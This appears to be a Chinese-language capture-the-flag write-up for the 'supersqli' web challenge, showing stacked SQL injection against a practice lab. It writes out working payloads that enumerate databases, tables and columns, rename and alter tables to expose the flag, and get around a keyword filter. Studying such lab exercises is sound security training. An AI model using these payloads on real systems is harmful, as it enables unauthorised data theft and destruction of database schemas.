功防世界--Web进阶--supersqli---堆叠注入

目录

信息搜集

payload

 

功防世界--Web进阶--supersqli---堆叠注入 

信息搜集

先添加一个单引号,报错,错误信息如下:

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

接着测试--+注释,发现被过滤,然后使用#注释,可行 用order by语句判断出有两个字段,接着使用union select 爆字段,发现这个时候出现了如下提示:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现上面的关键字都被过滤不能使用了,没法进行注入,这个时候尝试一下堆叠注入

现在回到这道题,利用堆叠注入,查询所有数据库:

1';show databases;#

 

功防世界--Web进阶--supersqli---堆叠注入

查询所有表:

1';show tables;#

功防世界--Web进阶--supersqli---堆叠注入

查询words表中所有列:

1';show columns from words;#

功防世界--Web进阶--supersqli---堆叠注入

查询1919810931114514表中所有列

1';show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)

功防世界--Web进阶--supersqli---堆叠注入

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id

 

payload

words即为inject表,注入的位置为id列   其对应的值为data列

将与words并列的表改为words表,并将flag列改为id列

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

然后读取当前表的所有信息 

1' or 1=1 #

功防世界--Web进阶--supersqli---堆叠注入

 

上一篇:Day13_商品详情及静态化


下一篇:攻防世界-web-高手进阶区017-supersqli